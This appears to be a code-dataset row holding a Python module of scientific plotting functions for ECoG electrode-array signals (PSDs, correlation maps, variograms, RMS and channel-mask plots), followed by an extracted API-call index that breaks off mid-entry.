code stringlengths 31 1.05M | apis list | extract_api stringlengths 97 1.91M |
|---|---|---|
import numpy as np
from ecogdata.util import get_default_args
from ecogdata.util import fenced_out
from ecogdata.devices.units import nice_unit_text
from ecoglib.vis.plot_util import filled_interval, light_boxplot
from ecoglib.vis.colormaps import nancmap
from ecoglib.estimation.spatial_variance import covar_to_iqr_lines, matern_semivariogram, make_matern_label, \
plot_electrode_graph
from .signal_tools import bad_channel_mask, band_power, block_psds, logged_estimators, safe_avg_power, safe_corrcoef,\
spatial_autocovariance
from ..vis import plotters
__all__ = ['plot_psds', 'plot_electrode_graph', 'plot_avg_psds', 'plot_centered_rxx', 'plot_channel_mask',
'plot_mean_psd', 'plot_mux_columns', 'plot_rms_array', 'plot_site_corr', 'spatial_variance']
psd_colors = ["#348ABD", "#A60628"]
def plot_psds(f, gf, df, fc, title, ylims=(), root_hz=True, units='V', iqr_thresh=None):
"""Plot spectral power density estimate for each array channel
(and possibly ground channels). Compute RMS power for the bandpass
determined by "fc".
Parameters
----------
f : ndarray
frequency vector
gf : ndarray
psd matrix for grounded input channels
df : ndarray
psd matrix for array signal channels
fc : float
cutoff frequency for RMS power calculation
title : str
plot title
ylims : pair (optional)
plot y-limits
root_hz : (boolean)
units normalized by 1/sqrt(Hz) (true) or 1/Hz (false)
Returns
-------
figure
"""
# compute outliers based on sum power
if not iqr_thresh:
iqr_thresh = get_default_args(fenced_out)['thresh']
plt = plotters.plt
fig = plt.figure()
fx = (f > 1) & (f < fc)
# apply a wide-tolerance mask -- want to avoid plotting any
# channels with zero (or negligable) power
s_pwr = band_power(f, df, fc=fc, root_hz=root_hz)
m = bad_channel_mask(np.log(s_pwr), iqr=iqr_thresh)
df = df[m]
plt.semilogy(
f[fx], df[0, fx], color=psd_colors[0], label='sig channels'
)
plt.semilogy(
f[fx], df[1:, fx].T, color=psd_colors[0], label='_nolegend_'
)
df_band_pwr = (df[:, fx] ** 2).mean()
avg_d = np.sqrt(df_band_pwr * f[-1])
plt.axhline(
y=np.sqrt(df_band_pwr), color='chartreuse', linestyle='--',
linewidth=4, label='sig avg RMS/$\sqrt{Hz}$'
)
if gf is not None and len(gf):
plt.semilogy(f[fx], gf[0, fx], color=psd_colors[1], label='ground channels')
if len(gf):
plt.semilogy(f[fx], gf[1:, fx].T, color=psd_colors[1], label='_nolegend_')
gf_band_pwr = (gf[:, fx] ** 2).mean()
avg_g = np.sqrt(gf_band_pwr * f[-1])
plt.axhline(
y=np.sqrt(gf_band_pwr), color='k', linestyle='--', linewidth=4,
label='gnd avg RMS/$\sqrt{Hz}$'
)
plt.legend(loc='upper right')
units = nice_unit_text(units).strip('$')
if root_hz:
units_label = '$' + units + '/\sqrt{Hz}$'
else:
units_label = '$%s^{2}/Hz$' % units
plt.ylabel(units_label);
plt.xlabel('Hz (half-BW %d Hz)' % int(f[-1]))
title = title + '\nSig RMS %1.2e' % avg_d
if gf is not None:
title = title + '; Gnd RMS %1.2e' % avg_g
plt.title(title)
plt.grid(which='both')
if ylims:
plt.ylim(ylims)
offscreen = df[:, fx].mean(axis=1) < ylims[0]
if np.any(offscreen):
plt.gca().annotate(
'%d chans off-screen' % offscreen.sum(),
(200, ylims[0]), xycoords='data',
xytext=(50, 3 * ylims[0]), textcoords='data',
arrowprops=dict(facecolor='black', shrink=0.05)
)
return fig
def plot_mean_psd(f, gf, df, fc, title, ylims=(), root_hz=True, units='V', iqr_thresh=None):
"""Plot the mean spectral power density estimate for array
channels (and possibly ground channels). Compute RMS power for the
bandpass determined by "fc". Plot outlier PSDs individually.
Parameters
----------
f : sequence
frequency vector
gf : ndarray
psd matrix for grounded input channels
df : ndarray
psd matrix for array signal channels
fc : float
cutoff frequency for RMS power calculation
title : str
plot title
ylims : pair (optional)
plot y-limits
root_hz : (boolean)
units normalized by 1/sqrt(Hz) (true) or 1/Hz (false)
iqr_thresh : float (optional)
set the outlier threshold (as a multiple of the interquartile
range)
Returns
-------
figure
"""
plt = plotters.plt
# compute outliers based on sum power
if not iqr_thresh:
iqr_thresh = get_default_args(fenced_out)['thresh']
s_pwr = band_power(f, df, fc=fc, root_hz=root_hz)
s_pwr_mask = bad_channel_mask(np.log(s_pwr), iqr=iqr_thresh)
## s_pwr_mask = nut.fenced_out(np.log(s_pwr), thresh=iqr_thresh)
## s_pwr_mask = s_pwr_mask & (s_pwr > 0)
s_pwr_mean = np.mean(s_pwr[s_pwr_mask])
df = np.log(df)
s_psd_mn = np.mean(df[s_pwr_mask], axis=0)
s_psd_stdev = np.std(df[s_pwr_mask], axis=0)
s_psd_lo = s_psd_mn - s_psd_stdev
s_psd_hi = s_psd_mn + s_psd_stdev
s_psd_mn, s_psd_lo, s_psd_hi = map(np.exp, (s_psd_mn, s_psd_lo, s_psd_hi))
avg_d = np.sqrt(s_pwr[s_pwr_mask].mean())
fig, ln = filled_interval(
plt.semilogy, f, s_psd_mn, (s_psd_lo, s_psd_hi), psd_colors[0]
)
sig_baseline = s_psd_mn[f > f.max() / 2].mean()
legends = [r'mean signal PSD $\pm \sigma$']
df_o = None
if np.any(~s_pwr_mask):
df_o = np.exp(df[~s_pwr_mask])
o_lines = plt.semilogy(f, df_o.T, '#BD6734', lw=0.5)
ln.append(o_lines[0])
legends.append('outlier signal PSDs')
# let's label these lines
chan_txt = 'outlier sig chans: ' + \
', '.join([str(c) for c in (~s_pwr_mask).nonzero()[0]])
y = 0.5 * (np.ceil(np.log(s_psd_mn.max())) + np.log(sig_baseline))
plt.text(200, np.exp(y), chan_txt, fontsize=10, va='baseline')
if gf is not None and len(gf):
g_pwr = band_power(f, gf, fc=fc, root_hz=root_hz)
if len(g_pwr) > 1:
g_pwr_mask = fenced_out(np.log(g_pwr), thresh=iqr_thresh)
else:
g_pwr_mask = np.array([True])
g_pwr_mean = np.mean(g_pwr[g_pwr_mask])
gf = np.log(gf)
g_psd_mn = np.mean(gf[g_pwr_mask], axis=0)
g_psd_stdev = np.std(gf[g_pwr_mask], axis=0)
g_psd_lo = g_psd_mn - g_psd_stdev
g_psd_hi = g_psd_mn + g_psd_stdev
g_psd_mn, g_psd_lo, g_psd_hi = map(np.exp, (g_psd_mn, g_psd_lo, g_psd_hi))
avg_g = np.sqrt(g_pwr[g_pwr_mask].mean())
fig, g_ln = filled_interval(
plt.semilogy, f, g_psd_mn, (g_psd_lo, g_psd_hi), psd_colors[1],
ax=fig.axes[0]
)
ln.extend(g_ln)
legends.append(r'mean grounded input $\pm \sigma$')
if np.any(~g_pwr_mask):
o_lines = plt.semilogy(
f, np.exp(gf[~g_pwr_mask]).T, '#06A684', lw=0.5
)
ln.append(o_lines[0])
legends.append('outlier grounded PSDs')
chan_txt = 'outlier gnd chans: ' + \
', '.join([str(c) for c in (~g_pwr_mask).nonzero()[0]])
y = sig_baseline ** 0.33 * g_psd_mn.mean() ** 0.67
plt.text(200, y, chan_txt, fontsize=10, va='baseline')
plt.legend(ln, legends, loc='upper right', fontsize=11)
units = nice_unit_text(units).strip('$')
if root_hz:
units_label = '$' + units + '/\sqrt{Hz}$'
else:
units_label = '$%s^{2}/Hz$' % units
plt.ylabel(units_label);
plt.xlabel('Hz (half-BW %d Hz)' % int(f[-1]))
if gf is not None and len(gf):
title = title + \
'\nGnd RMS %1.2e; Sig RMS %1.2e (to %d Hz)' % (avg_g, avg_d, fc)
else:
title = title + \
'\nSig RMS %1.2e (to %d Hz)' % (avg_d, fc)
plt.title(title)
plt.grid(which='both')
if ylims:
plt.ylim(ylims)
if df_o is not None:
offscreen = df_o.mean(axis=1) < ylims[0]
if np.any(offscreen):
plt.gca().annotate(
'%d chans off-screen' % offscreen.sum(),
(200, ylims[0]), xycoords='data',
xytext=(50, 3 * ylims[0]), textcoords='data',
arrowprops=dict(facecolor='black', shrink=0.05)
)
return fig
def plot_avg_psds(ecog_chans, ground_chans, title, bsize_sec=2, Fs=1, iqr_thresh=None, units='V', **mtm_kw):
# make two plots with
# 1) all spectra
# 2) average +/- sigma, and outliers
freqs, e_psds = block_psds(ecog_chans, bsize_sec, Fs, **mtm_kw)
e_psds = logged_estimators(e_psds, sem=False)[0]
np.sqrt(e_psds, e_psds)
if len(ground_chans):
freqs, g_psds = block_psds(ground_chans, bsize_sec, Fs, **mtm_kw)
g_psds = logged_estimators(g_psds, sem=False)[0]
np.sqrt(g_psds, g_psds)
ttl_str = '%s Fs=%d' % (title, round(Fs))
ymax = 10 ** np.ceil(np.log10(e_psds.max()) + 1)
ymin = ymax * 1e-6
fig = plot_psds(
freqs, g_psds, e_psds, Fs / 2, ttl_str,
ylims=(ymin, ymax),
iqr_thresh=iqr_thresh, units=units, root_hz=True
)
fig_avg = plot_mean_psd(
freqs, g_psds, e_psds, Fs / 2, ttl_str,
ylims=(ymin, ymax),
iqr_thresh=iqr_thresh, units=units, root_hz=True
)
return fig, fig_avg
def plot_centered_rxx(data, chan_map, label, cmap='bwr', normed=True, clim=None):
plt = plotters.plt
sns = plotters.sns
from seaborn import JointGrid
cxx = safe_corrcoef(data, 2000, normed=normed)
n = cxx.shape[0]
pitch = chan_map.pitch
if np.iterable(pitch):
pitch_x, pitch_y = pitch
else:
pitch_x = pitch_y = pitch
centered_rxx = spatial_autocovariance(cxx, chan_map, mean=False)
y, x = centered_rxx.shape[-2:]
midx = int(x / 2)
xx = (np.arange(x) - midx) * pitch_x
midy = int(y / 2)
yy = (np.arange(y) - midy) * pitch_y
# centered_rxx[:,midy,midx] = 1
with sns.axes_style('ticks'):
jgrid = JointGrid(
np.random.rand(50), np.random.rand(50), ratio=4,
xlim=(xx[0], xx[-1]), ylim=(yy[0], yy[-1]), size=8
)
cm = nancmap(cmap, nanc=(.5, .5, .5, .5))
## Joint plot
ax = jgrid.ax_joint
if clim is None:
clim = (-1, 1) if normed else np.percentile(centered_rxx, [2, 98])
ax.imshow(
np.nanmean(centered_rxx, axis=0), clim=clim, cmap=cm,
extent=[xx[0], xx[-1], yy[0], yy[-1]]
)
ax.set_xlabel('Site-site distance (mm)')
ax.set_ylabel('Site-site distance (mm)')
## Marginal-X
ax = jgrid.ax_marg_x
ax.spines['left'].set_visible(True)
ax.yaxis.tick_left()
plt.setp(ax.yaxis.get_majorticklines(), visible=True)
plt.setp(ax.get_yticklabels(), visible=True)
# arrange as samples over all x-distances
rxx_mx = np.reshape(centered_rxx, (-1, x))
vals = list()
for c in rxx_mx.T:
valid = ~np.isnan(c)
if valid.any():
vals.append(np.percentile(c[valid], [25, 50, 75]))
else:
vals.append([np.nan] * 3)
mx_lo, mx_md, mx_hi = map(np.array, zip(*vals))
filled_interval(
ax.plot, xx, mx_md, (mx_lo, mx_hi), cm(0.6), ax=ax, lw=2, alpha=.6
)
ax.set_yticks(np.linspace(-1, 1, 6))
ax.set_ylim(clim)
## Marginal-Y
ax = jgrid.ax_marg_y
ax.spines['top'].set_visible(True)
ax.xaxis.tick_top()
plt.setp(ax.xaxis.get_majorticklines(), visible=True)
plt.setp(ax.get_xticklabels(), visible=True)
rxx_my = np.reshape(np.rollaxis(centered_rxx, 2).copy(), (-1, y))
vals = list()
for c in rxx_my.T:
valid = ~np.isnan(c)
if valid.any():
vals.append(np.percentile(c[valid], [25, 50, 75]))
else:
vals.append([np.nan] * 3)
my_lo, my_md, my_hi = map(np.array, zip(*vals))
filled_interval(
ax.plot, yy, my_md, (my_lo, my_hi), cm(0.6),
ax=ax, lw=2, alpha=.6, fillx=True
)
ax.set_xticks(np.linspace(-1, 1, 6))
plt.setp(ax.xaxis.get_ticklabels(), rotation=-90)
ax.set_xlim(clim)
jgrid.fig.subplots_adjust(left=0.1, bottom=.1)
jgrid.ax_marg_x.set_title(
'Average centered correlation map: ' + label, fontsize=12
)
return jgrid.fig
def spatial_variance(data, chan_map, label, normed=False):
plt = plotters.plt
from seaborn import despine, xkcd_rgb
cxx = safe_corrcoef(data, 2000, normed=normed, semivar=True)
n = cxx.shape[0]
cxx_pairs = cxx[np.triu_indices(n, k=1)]
rms = safe_avg_power(data)
var_mu = (rms ** 2).mean()
var_se = (rms ** 2).std() / np.sqrt(len(rms))
chan_combs = chan_map.site_combinations
dist = chan_combs.dist
if np.iterable(chan_map.pitch):
pitch_x, pitch_y = chan_map.pitch
else:
pitch_x = pitch_y = chan_map.pitch
binsize = np.ceil(10 * (pitch_x ** 2 + pitch_y ** 2) ** 0.5) / 10.0
clrs = plt.rcParams['axes.prop_cycle'].by_key()['color']
pts, lines = covar_to_iqr_lines(dist, cxx_pairs, binsize=binsize, linewidths=1, colors=clrs[0])
xb, yb = pts
# set a fairly wide range for nugget and sill
bounds = {'nugget': (0, yb[0]), 'sill': (np.mean(yb), var_mu + 5 * var_se),
'nu': (0.4, 10), 'theta': (0.5, None)}
p = matern_semivariogram(
dist, y=cxx_pairs, theta=1, nu=1, sill=var_mu, nugget=yb[0] / 5.0,
free=('theta', 'nu', 'nugget', 'sill'), dist_limit=0.67,
wls_mode='irls', fit_mean=True, fraction_nugget=False, bounds=bounds)
f, ax = plt.subplots(figsize=(8, 5))
ax.scatter(dist, cxx_pairs, s=5, color='gray', alpha=0.2, rasterized=True, label='Pairwise semivariance')
ax.plot(*pts, color=clrs[0], ls='--', marker='o', ms=8, label='Binned semivariance')
ax.add_collection(lines)
ax.axhline(var_mu, lw=1, color=xkcd_rgb['reddish orange'], label='Avg signal variance', alpha=0.5)
ax.axhline(var_mu + var_se, lw=0.5, color=xkcd_rgb['reddish orange'], linestyle='--', alpha=0.5)
ax.axhline(var_mu - var_se, lw=0.5, color=xkcd_rgb['reddish orange'], linestyle='--', alpha=0.5)
ax.axhline(p['nugget'], lw=2, color=xkcd_rgb['dark lavender'], alpha=0.5, label='Noise "nugget" (uV^2)')
ax.axhline(p['sill'], lw=2, color=xkcd_rgb['teal green'], alpha=0.5, label='Spatial var. "sill" (uV^2)')
xm = np.linspace(dist.min(), dist.max(), 100)
model_label = 'Model: ' + make_matern_label(theta=p['theta'], nu=p['nu'])
ax.plot(xm, matern_semivariogram(xm, **p), color=clrs[1], label=model_label)
ax.set_xlabel('Site-site distance (mm)')
if normed:
units = '(normalized)'
else:
units = '(uV^2)'
ax.set_ylabel('Semivariance ' + units)
despine(fig=f)
leg = ax.legend(loc='upper left', ncol=3, frameon=True)
for h in leg.legendHandles:
h.set_alpha(1)
try:
h.set_sizes([15] * len(h.get_sizes()))
except:
pass
ax.set_title(label + ' spatial variogram')
f.tight_layout(pad=0.2)
return f
def scatter_correlations(data, chan_map, mask, title, highlight='rows', pitch=1.0):
# plot the pairwise correlation values against distance of the pair
# Highlight channels that
# 1) share a row (highlight='rows')
# 2) share a column (highlight='cols')
# 3) either of the above (highlight='rows+cols')
# 4) are neighbors on a row (highlight='rownabes')
# 5) are neighbors on a column (highlight='colnabes')
# 6) any neighbor (4-5) (highlight='allnabes')
plt = plotters.plt
# data[g_chans] = np.nan
cxx = safe_corrcoef(data[mask], 2000)
n = cxx.shape[0]
cxx_pairs = cxx[np.triu_indices(n, k=1)]
if np.iterable(pitch):
pitch_x, pitch_y = pitch
else:
pitch_x = pitch_y = pitch
chan_combs = chan_map.subset(mask).site_combinations
dists = chan_combs.dist
fig = plt.figure()
panels = highlight.split(',')
if panels[0] == highlight:
plt.subplot(111)
plt.scatter(
dists, cxx_pairs, 9, label='_nolegend_', edgecolors='none', alpha=0.25, rasterized=True
)
fig.tight_layout()
fig.subplots_adjust(top=0.95)
fig.text(0.5, .96, title, fontsize=16, va='baseline', ha='center')
return fig
# hardwired for 16 channel muxing with grounded input on 1st chan
mux_index = np.arange(len(data)).reshape(-1, 15).transpose()[1:]
nrow, ncol = mux_index.shape
mux_index -= np.arange(1, ncol + 1)
colors = dict(rows='#E480DA', cols='#80E48A')
cxx = safe_corrcoef(data, 2000)
cxx_pairs = cxx[np.triu_indices(len(cxx), k=1)]
chan_combs = chan_map.site_combinations
dists = chan_combs.dist
for n, highlight in enumerate(panels):
plt.subplot(len(panels), 1, n + 1)
plt.scatter(
dists, cxx_pairs, 9, edgecolor='none', label='_nolegend_', alpha=0.25, rasterized=True
)
if highlight in ('rows', 'rows+cols'):
for row in mux_index:
row = [r for r in row if mask[r]]
if len(row) < 2:
continue
subset = chan_map.subset(row)
subcxx = cxx[row][:, row][np.triu_indices(len(row), k=1)]
subdist = subset.site_combinations.dist
c = plt.scatter(
subdist, subcxx, 20, colors['rows'],
edgecolor='white', label='_nolegend_'
)
# set label on last one
c.set_label('row combo')
if highlight in ('cols', 'rows+cols'):
for col in mux_index.T:
col = [c for c in col if mask[c]]
if len(col) < 2:
continue
subset = chan_map.subset(col)
subcxx = cxx[col][:, col][np.triu_indices(len(col), k=1)]
subdist = subset.site_combinations
c = plt.scatter(
subdist, subcxx, 20, colors['cols'],
edgecolor='white', label='_nolegend_'
)
# set label on last one
c.set_label('col combo')
if highlight in ('rownabes', 'allnabes'):
row_cxx = list()
row_dist = list()
for row in mux_index:
row = [r for r in row if mask[r]]
if len(row) < 2:
continue
for i1, i2 in zip(row[:-1], row[1:]):
ii = np.where(
(chan_combs.p1 == min(i1, i2)) & \
(chan_combs.p2 == max(i1, i2))
)[0][0]
row_cxx.append(cxx_pairs[ii])
row_dist.append(dists[ii])
c = plt.scatter(
row_dist, row_cxx, 20, colors['rows'],
edgecolor='white', label='row neighbors'
)
if highlight in ('colnabes', 'allnabes'):
col_cxx = list()
col_dist = list()
for col in mux_index.T:
col = [c for c in col if mask[c]]
if len(col) < 2:
continue
for i1, i2 in zip(col[:-1], col[1:]):
ii = np.where(
(chan_combs.p1 == min(i1, i2)) & \
(chan_combs.p2 == max(i1, i2))
)[0][0]
col_cxx.append(cxx_pairs[ii])
col_dist.append(dists[ii])
c = plt.scatter(
col_dist, col_cxx, 20, colors['cols'],
edgecolor='white', label='col neighbors'
)
plt.legend(loc='best')
ax = plt.gca()
ax.set_xlabel('Distance (mm)')
ax.set_ylabel('Correlation coef.')
fig.tight_layout()
fig.subplots_adjust(top=0.95)
fig.text(0.5, .96, title, fontsize=16, va='baseline', ha='center')
return fig
def plot_mux_columns(data, title, color_lims=True, units='uV'):
plt = plotters.plt
# data[g_chans] = np.nan
rms = safe_avg_power(data, 2000)
if color_lims:
vals = rms[np.isfinite(rms)]
# basically try to clip out anything small
vals = vals[vals > 1e-2 * np.median(vals)]
quantiles = np.percentile(vals, [5., 95.])
clim = tuple(quantiles)
else:
clim = (np.nanmin(rms), np.nanmax(rms))
rms = rms.reshape(-1, 15)
fig = plt.figure()
cm = nancmap('hot', nanc='dodgerblue')
plt.imshow(rms.T, origin='upper', cmap=cm, clim=clim)
cbar = plt.colorbar()
cbar.set_label(nice_unit_text(units) + ' RMS')
plt.title(title)
plt.xlabel('data column')
ax = fig.axes[0]
ax.set_aspect('auto')
ax.set_xticks(range(rms.shape[0]))
return fig
def plot_rms_array(data, chan_map, title, color_lims=True, units='uV'):
plt = plotters.plt
rms = safe_avg_power(data, 2000)
if color_lims:
vals = rms[np.isfinite(rms)]
# basically try to clip out anything small
vals = vals[vals > 1e-2 * np.median(vals)]
quantiles = np.percentile(vals, [5., 95.])
clim = tuple(quantiles)
else:
clim = (np.nanmin(rms), np.nanmax(rms))
rms_arr = chan_map.embed(rms)
# rms_arr = np.ones(chan_map.geometry)*np.nan
# np.put(rms_arr, chan_map, rms)
cm = nancmap('hot', nanc='dodgerblue')
f = plt.figure()
plt.imshow(rms_arr, origin='upper', cmap=cm, clim=clim)
cbar = plt.colorbar()
cbar.set_label(nice_unit_text(units) + ' RMS')
plt.title(title)
return f
def plot_site_corr(data, chan_map, title, bsize=2000, cmap=None, normed=True, stagger_x=False, stagger_y=False,
axs=None):
plt = plotters.plt
# data[g_chans] = np.nan
cxx = safe_corrcoef(data, bsize, normed=normed)
n = cxx.shape[0]
cxx.flat[0:n * n:n + 1] = np.nan
clim = (-1, 1) if normed else np.percentile(cxx, [2, 98])
if cmap is None:
import ecoglib.vis.colormaps as cmaps
cmap = cmaps.diverging_cm(clim[0], clim[1], ((0, 0, 0), (1, 0, 0)))
if axs is None:
f, axs = plt.subplots(1, 2, figsize=(12, 5))
else:
axs = axs.squeeze()
f = axs[0].figure
corr_ax = axs[0]
graph_ax = axs[1]
im = corr_ax.imshow(cxx, cmap=cmap, norm=plt.Normalize(*clim))
cbar = plt.colorbar(im, ax=corr_ax, use_gridspec=True)
cbar.set_label('avg corr coef')
corr_ax.axis('image')
plot_electrode_graph(cxx, chan_map, ax=graph_ax, stagger_y=stagger_y, stagger_x=stagger_x)
f.subplots_adjust(top=0.9, left=0.05, right=0.95, wspace=0.1)
f.text(0.5, 0.92, title, ha='center', va='baseline', fontsize=20)
return f
def plot_channel_mask(data, chan_map, title, units='V', bsize=2000, quantiles=(50, 80), iqr=3):
plt = plotters.plt
sns = plotters.sns
from seaborn import violinplot, xkcd_rgb
rms = safe_avg_power(data, bsize=bsize, iqr_thresh=7)
rms = np.log(rms)
mask = bad_channel_mask(rms, quantiles=quantiles, iqr=iqr)
f = plt.figure(figsize=(7, 4))
ax = f.add_subplot(121)
with sns.axes_style('whitegrid'):
violinplot(
np.ma.masked_invalid(rms).compressed(),
alpha=0.5, widths=0.5, names=[' '],
color=xkcd_rgb['amber'], orient='v'
)
sns.despine(ax=ax, left=True)
ax.plot(np.ones(mask.sum()) * 1.3, rms[mask], 'k+')
if np.sum(~mask):
ax.plot(np.ones(np.sum(~mask)) * 1.3, rms[~mask], 'r+')
ax.set_yticklabels(['%.1f' % s for s in np.exp(ax.get_yticks())])
ax.set_ylabel(nice_unit_text(units) + ' RMS')
ax.set_title('Distribution of log-power')
ax = f.add_subplot(122)
site_mask = np.ones(chan_map.geometry) * np.nan
site_mask.flat[chan_map.subset(mask.nonzero()[0])] = 1
site_mask.flat[chan_map.subset((~mask).nonzero()[0])] = 0
N = plt.cm.binary.N
im = ax.imshow(
site_mask,
cmap=plt.cm.winter, norm=plt.cm.colors.BoundaryNorm([0, .5, 1], N),
alpha=0.5, origin='upper'
)
cbar = plt.colorbar(im)
cbar.set_ticks([0, 1])
cbar.set_ticklabels(('rejected', 'accepted'))
ax.axis('image')
ax.set_title('Inlier electrodes')
f.text(0.5, 0.02, title, ha='center', va='baseline', fontsize=18)
return f, mask
def sinusoid_gain(data, ref, chan_map, log=True, **im_kws):
plt = plotters.plt
## d_rms = data.std(1)
## r_rms = ref.std()
## gain = d_rms / r_rms
data = data - data.mean(axis=-1, keepdims=1)
ref = ref - ref.mean()
gain = np.dot(data, ref) / np.dot(ref, ref)
f = plt.figure(figsize=(7.5, 4))
ax = plt.subplot2grid((1, 100), (0, 0), colspan=25)
light_boxplot(
np.log10(gain) if log else gain, names=[''],
mark_mean=True, box_ls='solid', ax=ax
)
ax.set_ylabel('log10 gain' if log else 'gain')
ax = plt.subplot2grid((1, 100), (0, 25), colspan=75)
_, cbar = chan_map.image(gain, ax=ax, **im_kws)
cbar.set_label('array gain')
return f
| [
"numpy.sum",
"numpy.ones",
"numpy.isnan",
"numpy.mean",
"numpy.arange",
"numpy.exp",
"ecoglib.vis.plot_util.filled_interval",
"numpy.nanmean",
"numpy.std",
"numpy.random.rand",
"numpy.isfinite",
"ecoglib.estimation.spatial_variance.make_matern_label",
"ecoglib.vis.colormaps.diverging_cm",
... | [((2227, 2255), 'numpy.sqrt', 'np.sqrt', (['(df_band_pwr * f[-1])'], {}), '(df_band_pwr * f[-1])\n', (2234, 2255), True, 'import numpy as np\n'), ((5026, 5052), 'numpy.mean', 'np.mean', (['s_pwr[s_pwr_mask]'], {}), '(s_pwr[s_pwr_mask])\n', (5033, 5052), True, 'import numpy as np\n'), ((5063, 5073), 'numpy.log', 'np.log', (['df'], {}), '(df)\n', (5069, 5073), True, 'import numpy as np\n'), ((5089, 5120), 'numpy.mean', 'np.mean', (['df[s_pwr_mask]'], {'axis': '(0)'}), '(df[s_pwr_mask], axis=0)\n', (5096, 5120), True, 'import numpy as np\n'), ((5139, 5169), 'numpy.std', 'np.std', (['df[s_pwr_mask]'], {'axis': '(0)'}), '(df[s_pwr_mask], axis=0)\n', (5145, 5169), True, 'import numpy as np\n'), ((5386, 5465), 'ecoglib.vis.plot_util.filled_interval', 'filled_interval', (['plt.semilogy', 'f', 's_psd_mn', '(s_psd_lo, s_psd_hi)', 'psd_colors[0]'], {}), '(plt.semilogy, f, s_psd_mn, (s_psd_lo, s_psd_hi), psd_colors[0])\n', (5401, 5465), False, 'from ecoglib.vis.plot_util import filled_interval, light_boxplot\n'), ((5604, 5623), 'numpy.any', 'np.any', (['(~s_pwr_mask)'], {}), '(~s_pwr_mask)\n', (5610, 5623), True, 'import numpy as np\n'), ((8856, 8879), 'numpy.sqrt', 'np.sqrt', (['e_psds', 'e_psds'], {}), '(e_psds, e_psds)\n', (8863, 8879), True, 'import numpy as np\n'), ((9818, 9836), 'numpy.iterable', 'np.iterable', (['pitch'], {}), '(pitch)\n', (9829, 9836), True, 'import numpy as np\n'), ((13151, 13178), 'numpy.iterable', 'np.iterable', (['chan_map.pitch'], {}), '(chan_map.pitch)\n', (13162, 13178), True, 'import numpy as np\n'), ((13425, 13512), 'ecoglib.estimation.spatial_variance.covar_to_iqr_lines', 'covar_to_iqr_lines', (['dist', 'cxx_pairs'], {'binsize': 'binsize', 'linewidths': '(1)', 'colors': 'clrs[0]'}), '(dist, cxx_pairs, binsize=binsize, linewidths=1, colors=\n clrs[0])\n', (13443, 13512), False, 'from ecoglib.estimation.spatial_variance import covar_to_iqr_lines, matern_semivariogram, make_matern_label, plot_electrode_graph\n'), ((13716, 13939), 'ecoglib.estimation.spatial_variance.matern_semivariogram', 'matern_semivariogram', (['dist'], {'y': 'cxx_pairs', 'theta': '(1)', 'nu': '(1)', 'sill': 'var_mu', 'nugget': '(yb[0] / 5.0)', 'free': "('theta', 'nu', 'nugget', 'sill')", 'dist_limit': '(0.67)', 'wls_mode': '"""irls"""', 'fit_mean': '(True)', 'fraction_nugget': '(False)', 'bounds': 'bounds'}), "(dist, y=cxx_pairs, theta=1, nu=1, sill=var_mu, nugget=\n yb[0] / 5.0, free=('theta', 'nu', 'nugget', 'sill'), dist_limit=0.67,\n wls_mode='irls', fit_mean=True, fraction_nugget=False, bounds=bounds)\n", (13736, 13939), False, 'from ecoglib.estimation.spatial_variance import covar_to_iqr_lines, matern_semivariogram, make_matern_label, plot_electrode_graph\n'), ((15131, 15145), 'seaborn.despine', 'despine', ([], {'fig': 'f'}), '(fig=f)\n', (15138, 15145), False, 'from seaborn import despine, xkcd_rgb\n'), ((16104, 16122), 'numpy.iterable', 'np.iterable', (['pitch'], {}), '(pitch)\n', (16115, 16122), True, 'import numpy as np\n'), ((16881, 16903), 'numpy.arange', 'np.arange', (['(1)', '(ncol + 1)'], {}), '(1, ncol + 1)\n', (16890, 16903), True, 'import numpy as np\n'), ((20812, 20845), 'ecoglib.vis.colormaps.nancmap', 'nancmap', (['"""hot"""'], {'nanc': '"""dodgerblue"""'}), "('hot', nanc='dodgerblue')\n", (20819, 20845), False, 'from ecoglib.vis.colormaps import nancmap\n'), ((21696, 21729), 'ecoglib.vis.colormaps.nancmap', 'nancmap', (['"""hot"""'], {'nanc': '"""dodgerblue"""'}), "('hot', nanc='dodgerblue')\n", (21703, 21729), False, 'from ecoglib.vis.colormaps import nancmap\n'), ((22812, 22906), 'ecoglib.estimation.spatial_variance.plot_electrode_graph', 'plot_electrode_graph', (['cxx', 'chan_map'], {'ax': 'graph_ax', 'stagger_y': 'stagger_y', 'stagger_x': 'stagger_x'}), '(cxx, chan_map, ax=graph_ax, stagger_y=stagger_y,\n stagger_x=stagger_x)\n', (22832, 22906), False, 'from ecoglib.estimation.spatial_variance import covar_to_iqr_lines, matern_semivariogram, make_matern_label, plot_electrode_graph\n'), ((23310, 23321), 'numpy.log', 'np.log', (['rms'], {}), '(rms)\n', (23316, 23321), True, 'import numpy as np\n'), ((1942, 1955), 'numpy.log', 'np.log', (['s_pwr'], {}), '(s_pwr)\n', (1948, 1955), True, 'import numpy as np\n'), ((2690, 2718), 'numpy.sqrt', 'np.sqrt', (['(gf_band_pwr * f[-1])'], {}), '(gf_band_pwr * f[-1])\n', (2697, 2718), True, 'import numpy as np\n'), ((3419, 3436), 'numpy.any', 'np.any', (['offscreen'], {}), '(offscreen)\n', (3425, 3436), True, 'import numpy as np\n'), ((4864, 4877), 'numpy.log', 'np.log', (['s_pwr'], {}), '(s_pwr)\n', (4870, 4877), True, 'import numpy as np\n'), ((5640, 5663), 'numpy.exp', 'np.exp', (['df[~s_pwr_mask]'], {}), '(df[~s_pwr_mask])\n', (5646, 5663), True, 'import numpy as np\n'), ((6369, 6395), 'numpy.mean', 'np.mean', (['g_pwr[g_pwr_mask]'], {}), '(g_pwr[g_pwr_mask])\n', (6376, 6395), True, 'import numpy as np\n'), ((6410, 6420), 'numpy.log', 'np.log', (['gf'], {}), '(gf)\n', (6416, 6420), True, 'import numpy as np\n'), ((6440, 6471), 'numpy.mean', 'np.mean', (['gf[g_pwr_mask]'], {'axis': '(0)'}), '(gf[g_pwr_mask], axis=0)\n', (6447, 6471), True, 'import numpy as np\n'), ((6494, 6524), 'numpy.std', 'np.std', (['gf[g_pwr_mask]'], {'axis': '(0)'}), '(gf[g_pwr_mask], axis=0)\n', (6500, 6524), True, 'import numpy as np\n'), ((6763, 6863), 'ecoglib.vis.plot_util.filled_interval', 'filled_interval', (['plt.semilogy', 'f', 'g_psd_mn', '(g_psd_lo, g_psd_hi)', 'psd_colors[1]'], {'ax': 'fig.axes[0]'}), '(plt.semilogy, f, g_psd_mn, (g_psd_lo, g_psd_hi), psd_colors\n [1], ax=fig.axes[0])\n', (6778, 6863), False, 'from ecoglib.vis.plot_util import filled_interval, light_boxplot\n'), ((6988, 7007), 'numpy.any', 'np.any', 